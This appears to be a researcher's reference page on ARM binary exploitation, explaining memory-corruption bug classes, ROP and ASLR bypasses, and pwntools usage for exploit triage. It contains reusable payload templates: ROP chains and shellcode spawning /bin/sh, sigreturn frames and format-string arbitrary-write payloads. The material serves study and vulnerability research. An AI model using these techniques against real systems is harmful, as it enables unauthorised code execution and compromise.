Most of the targets I work with at Talos are ARM-based embedded devices or stripped binaries with no symbols. When a fuzzer surfaces a crash, the next question is always the same: what class of bug is this, and can it be turned into something more than a denial of service? This page is the reference I keep open during that triage. It covers ARM architecture details, the vulnerability classes that come up most often, and the pwntools calls I use to build and test payloads.
Overview
Binary exploitation turns software bugs (memory corruption, logic flaws, integer errors) into controlled execution. Modern targets combine multiple mitigations — ASLR, DEP/NX, stack canaries — so successful exploits chain techniques together rather than relying on a single primitive.
This page focuses on ARM exploitation concepts and the pwntools framework used to build and deliver payloads.
ARM architecture basics
ARM (Advanced RISC Machine) is a RISC architecture. The classic cores are 32-bit, and most instructions are designed to complete in a single cycle:
- General purpose registers: r0–r12 (13 total)
- Special registers: sp (stack pointer), lr (link register), pc (program counter)
- Operating modes: 32-bit ARM and 16-bit Thumb. Use gcc -marm to force 32-bit ARM code.
- No RET instruction: return by branching to LR (bx lr) or popping a value into PC (pop {pc}).
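The ARM/Thumb split matters as soon as a return address is forged: an interworking branch such as bx lr takes the instruction set from bit 0 of the target address. A minimal sketch of that adjustment, assuming a made-up gadget address (the helper name is mine, not a pwntools call):

```python
def interworking_target(addr: int, thumb: bool) -> int:
    """Value to place in LR/PC for an interworking branch (bx / blx)."""
    if thumb:
        return addr | 1        # bit 0 set: continue in Thumb state
    return addr & ~0b11        # ARM instructions are 4-byte aligned, bit 0 clear

gadget = 0x000104D0            # hypothetical gadget address, not from a real binary
print(hex(interworking_target(gadget, thumb=True)))
print(hex(interworking_target(gadget, thumb=False)))
```

Forgetting the low bit on a Thumb gadget is a common reason a chain that looks right still crashes on the first branch.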
ARM64 (AArch64) extends this to 64-bit with a richer register set (x0–x30, sp, pc).
Vulnerability classes
Stack buffer overflow
Overflow a stack variable to overwrite the saved return address (or LR). When the function returns, execution redirects to attacker-controlled code. The key target on ARM is the saved LR or the saved PC value on the stack.
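As a rough illustration of the layout, the payload is just padding up to the saved return slot followed by the replacement address in little-endian form. The offset and target below are placeholders, and struct stands in for pwntools' p32 so the sketch runs without it:

```python
import struct

def build_overflow(offset: int, new_pc: int) -> bytes:
    """Padding up to the saved LR slot, then the new 32-bit little-endian address."""
    return b"A" * offset + struct.pack("<I", new_pc)

OFFSET = 68            # hypothetical distance from buffer start to the saved LR
TARGET = 0x00010494    # hypothetical address to return to

payload = build_overflow(OFFSET, TARGET)
print(len(payload), payload[-4:].hex())
```

In practice the offset comes from a cyclic pattern and the crash register dump, not from reading the disassembly.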
Heap buffer overflow
The heap holds dynamically allocated chunks. Overflowing a heap chunk can corrupt adjacent metadata or function pointers. Unlike a stack overflow, the payoff is not immediate at function return — it fires when the overwritten pointer is dereferenced. This makes heap exploits more timing-sensitive and layout-dependent.
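The delayed payoff is easier to see in a toy model. The sketch below treats the heap as a flat bytearray holding two adjacent 16-byte chunks, with a function pointer at the start of the second one. It ignores allocator metadata entirely, and the handler addresses are invented:

```python
import struct

CHUNK = 16                      # toy chunk size, no allocator metadata modelled
heap = bytearray(CHUNK * 2)     # chunk A at offset 0, chunk B at offset 16

HANDLER_OK = 0x00010500         # hypothetical legitimate handler address
HANDLER_EVIL = 0x41414141       # attacker-chosen value

# Chunk B starts with a 4-byte function pointer.
struct.pack_into("<I", heap, CHUNK, HANDLER_OK)

def write_to_a(data: bytes) -> None:
    """Copy into chunk A with no bounds check, like an unchecked memcpy."""
    heap[0:len(data)] = data

# 16 bytes fill chunk A; the next 4 land on chunk B's pointer.
write_to_a(b"A" * CHUNK + struct.pack("<I", HANDLER_EVIL))

# Nothing happens until the program later loads and calls the pointer.
(called,) = struct.unpack_from("<I", heap, CHUNK)
print(hex(called))
```

The write and the hijack are separate events, which is why the chunk layout and the order of operations both have to be controlled.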
Use-after-free (UAF)
A pointer is used after the memory it references has been freed. Exploitation steps:
- Trigger the free of the target heap object.
- Reclaim the freed region with attacker-controlled allocation.
- Prepare a ROP payload at a known address.
- Overwrite function pointers in the reclaimed chunk.
- Trigger the code path that dereferences the freed pointer.
- Control jumps to the ROP payload.
Summary: free → overwrite → use.
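The free, reclaim, use sequence can be modelled with a toy allocator. This is a simplified sketch, assuming fixed-size slots and a last-in-first-out free list (loosely how small-chunk caches behave); real allocators differ in detail, and every name here is illustrative:

```python
class ToyHeap:
    """Fixed-size slots with a LIFO free list."""

    def __init__(self, slots: int):
        self.mem = [None] * slots
        self.free_list = list(range(slots - 1, -1, -1))

    def alloc(self, value):
        idx = self.free_list.pop()     # most recently freed slot is reused first
        self.mem[idx] = value
        return idx

    def free(self, idx):
        self.free_list.append(idx)     # contents stay in place, as in C

def legit_handler():
    return "legit"

def attacker_handler():
    return "hijacked"

heap = ToyHeap(4)
obj = heap.alloc({"handler": legit_handler})        # victim object
heap.free(obj)                                      # free: `obj` is now dangling
spray = heap.alloc({"handler": attacker_handler})   # reclaim the same slot
result = heap.mem[obj]["handler"]()                 # use through the stale index
print(spray == obj, result)
```

The reclaim only works because the new allocation has the same size class as the freed object, which is the part that usually takes the most trial and error on a real target.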
Off-by-one / one-byte overflow
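Writing exactly one byte past a buffer boundary. On 32-bit ARM, corrupting the least significant byte of a saved stack pointer or frame pointer can be enough to redirect control flow, because a later epilogue then restores its registers, PC included, from a shifted location.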
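To get a feel for how far one byte can move a pointer, here is a small sketch of a stray NUL terminator landing on the low byte of a little-endian saved pointer. The pointer value is hypothetical:

```python
def clobber_lsb(saved_ptr: int, stray_byte: int = 0x00) -> int:
    """Model a one-byte overflow into the lowest byte of a saved 32-bit pointer."""
    return (saved_ptr & 0xFFFFFF00) | stray_byte

saved_fp = 0xBEFFF4C8              # hypothetical saved frame pointer
new_fp = clobber_lsb(saved_fp)     # e.g. an off-by-one NUL terminator
print(hex(new_fp), saved_fp - new_fp)
```

The pointer can only move within a 256-byte window, so the bug is useful when attacker-controlled data already sits inside that window.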
Integer overflow
Sizing and casting bugs — mixing short/int/long or signed/unsigned types — can produce an unexpectedly small allocation size. The caller then writes more data than the allocation can hold, overflowing into adjacent memory.
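The arithmetic is worth working through once. The sketch below mimics a 32-bit unsigned multiply and a narrowing cast to a signed 16-bit value using masks. The element count and sizes are example inputs, not taken from a real bug:

```python
MASK32 = 0xFFFFFFFF

def alloc_size_u32(count: int, elem_size: int) -> int:
    """Size as a 32-bit unsigned multiply would compute it (wraps modulo 2**32)."""
    return (count * elem_size) & MASK32

def as_int16(value: int) -> int:
    """Reinterpret the low 16 bits as a signed short, as a narrowing cast would."""
    value &= 0xFFFF
    return value - 0x10000 if value & 0x8000 else value

count = 0x40000001                  # attacker-supplied element count
size = alloc_size_u32(count, 4)     # 4-byte elements
print(size)                         # allocation request after wraparound
print(as_int16(40000))              # a length that turns negative as a short
```

A request for over a billion elements ends up allocating 4 bytes, while the copy loop still iterates over the original count.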
Bypassing mitigations
DEP / NX — Return Oriented Programming (ROP)
ROP chains small existing code sequences ("gadgets") that each end in a return: ret on x86, or an equivalent such as pop {..., pc} or bx lr on ARM. Because gadgets already live in executable memory, NX does not stop them. The chain is placed on the stack; redirecting PC to the first gadget drives execution through the sequence.
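On 32-bit ARM the smallest useful chain is often a single pop {r0, pc} gadget followed by the argument and the function to call. The sketch below lays that out by hand; every address and the offset are placeholders, and the local p32 is a stand-in for the pwntools function of the same name:

```python
import struct

def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian word (stand-in for pwntools' p32)."""
    return struct.pack("<I", value)

# All values below are hypothetical placeholders.
POP_R0_PC = 0x000103A4   # gadget: pop {r0, pc}
BIN_SH = 0x00021000      # address of a "/bin/sh" string
SYSTEM = 0x00010300      # address of system()
OFFSET = 68              # padding up to the saved return address

chain = b"".join([
    p32(POP_R0_PC),      # overwrites the saved return address: first gadget
    p32(BIN_SH),         # popped into r0 (first argument)
    p32(SYSTEM),         # popped into pc: system(r0)
])
payload = b"A" * OFFSET + chain
print(len(payload))
```

Each gadget's pop list dictates how many words the chain has to supply before the next address, so the layout follows directly from the gadget's operands.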
Runtime memory patching via ROP: overwrite a critical variable without injecting shellcode — useful when only a flag needs flipping.
ASLR
Two strategies:
- Bruteforce: practical only on 32-bit (limited address space, ~16-bit entropy).
- Information leak: read a pointer from process memory (e.g., via format string: %p leaks stack addresses). Compute the ASLR slide as leaked_address - static_address. Apply the slide to relocate any gadget or function.
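The slide arithmetic for the information-leak route looks like this in practice. The leaked string and both static offsets are invented for the example; on a real target the static values come from the library file and the leak from the process:

```python
def aslr_slide(leaked: int, static: int) -> int:
    """Slide = runtime address minus the address of the same symbol in the file."""
    return leaked - static

def rebase(static: int, slide: int) -> int:
    """Runtime address of any other symbol in the same module."""
    return static + slide

leak_text = b"0xb6e5a7c0"               # hypothetical output of a %p leak
leaked_puts = int(leak_text.decode(), 16)

STATIC_PUTS = 0x0005A7C0                # hypothetical offset of puts in the library
STATIC_SYSTEM = 0x00039A10              # hypothetical offset of system

slide = aslr_slide(leaked_puts, STATIC_PUTS)
assert slide & 0xFFF == 0               # sanity check: module bases are page-aligned
print(hex(slide), hex(rebase(STATIC_SYSTEM, slide)))
```

The page-alignment check is cheap and catches most cases where the leaked value belongs to a different symbol or module than assumed.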
pwntools reference
Process interaction
from pwn import *
# Pick one way to start the target
p = process('./target') # local binary
p = remote('127.0.0.1', 1337) # TCP service
p = process(['./target', '--arg'], env={'VAR': 'val'}) # with arguments and environment
# Attach GDB to running process
gdb.attach(p)
# Start under GDB with ASLR disabled
p = gdb.debug('./target', aslr=False, gdbscript='b *main+123')
# I/O
p.send(b'data') # write without newline
p.sendline(b'data') # write with newline
p.recv(n) # read n bytes
p.recvline() # read until \n
p.recvuntil(b'prompt') # read until delimiter (bytes in Python 3)
p.sendlineafter(b'> ', b'payload')
p.interactive() # hand control to terminal
Context
context.arch = 'aarch64' # or 'arm', 'amd64', 'i386'
context.endian = 'little' # or 'big'
context.log_level = 'info' # 'debug' | 'warn' | 'error'
Encoding and packing
# Integer ↔ bytes (little-endian by default)
p32(0xdeadbeef) # → b'\xef\xbe\xad\xde'
p64(0xcafebabe)
u32(b'\xef\xbe\xad\xde') # → 0xdeadbeef
# Cyclic sequences to find offsets
cyclic(32) # → b'aaaabaaacaaa...'
cyclic_find(0x61616164) # → 12 (byte offset)
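The reason a crash value maps back to a unique offset is that the pattern is a de Bruijn sequence: every 4-byte window occurs only once. The sketch below is a plain-Python illustration of that idea, not pwntools' own implementation. It reproduces the prefix shown above, and the function names are mine:

```python
import string
from itertools import islice

def de_bruijn(alphabet: bytes, n: int):
    """Yield a de Bruijn sequence over `alphabet` with window length `n`."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def pattern(length: int) -> bytes:
    """First `length` bytes of the sequence over a-z with 4-byte windows."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), 4), length))

def pattern_find(value: int) -> int:
    """Offset of a 32-bit little-endian value read back from a crashed register."""
    needle = value.to_bytes(4, "little")
    return pattern(8192).find(needle)

print(pattern(16))
print(pattern_find(0x61616164))
```

The little-endian conversion in pattern_find is the step that is easy to get backwards when reading a register value off a crash dump by hand.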
ELF introspection
elf = ELF('./target')
elf.plt.puts # address of puts@PLT
elf.got['puts'] # address of puts@GOT
elf.sym['main'] # symbol address
# Set base address after leaking it (for ASLR bypass)
libc = ELF('./libc.so.6')
libc.address = leaked_libc_base
libc.sym.puts # now correctly rebased
bin_sh = next(libc.search(b'/bin/sh'))
ROP chain building
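rop = ROP(elf)
# Find specific gadgets (x86-64 register names; on ARM look for pop {r0, pc} and similar)
pop_rdi = rop.rdi.address
syscall = rop.find_gadget(['syscall', 'ret']).address
# Stage 1: leak the runtime address of puts, then return to main for a second payload
rop.call(elf.sym.puts, [elf.got['puts']])
rop.call(elf.sym.main)
payload = b'A' * offset + rop.chain()
# Stage 2: once libc.address has been set from the leak, call system("/bin/sh")
rop2 = ROP(libc)
rop2.call(libc.sym.system, [bin_sh])
payload2 = b'A' * offset + rop2.chain()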
Shellcraft and assembly
shellcode = shellcraft.sh() # /bin/sh via execve for the current context.arch
payload = asm(shellcode) # asm() already returns bytes
# Or manually (x86-64 syntax; needs context.arch = 'amd64')
shellcode = asm('''
lea rdi, [rip+bin_sh]
xor rsi, rsi
xor rdx, rdx
mov rax, SYS_execve
syscall
bin_sh:
.string "/bin/sh"
''')
SROP (Sigreturn ROP)
Used when gadget availability is limited. A sigreturn syscall restores a complete register context from the stack, so a single forged frame sets every register at once.
# x86-64 frame shown; SigreturnFrame() follows context.arch
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr
payload = b'A' * offset + p64(sigret_gadget) + bytes(frame)
Format string exploits
# Automated payload for arbitrary writes
writes = {target_addr: value}
payload = fmtstr_payload(offset, writes)
# Auto-detect offset (FmtStr calls this repeatedly, so start a fresh process each time)
def send_data(payload):
    io = process('./target')
    io.sendline(payload)
    return io.recvall()
fmt = FmtStr(execute_fmt=send_data)
offset = fmt.offset
What I reach for first
Stack buffer overflows are the starting point: straightforward offset calculation with cyclic, confirm PC control, then layer in a ROP chain to bypass NX. For targets where ASLR is the main obstacle, I look for a format string primitive first — a single %p leak often collapses the address space problem before anything else needs solving.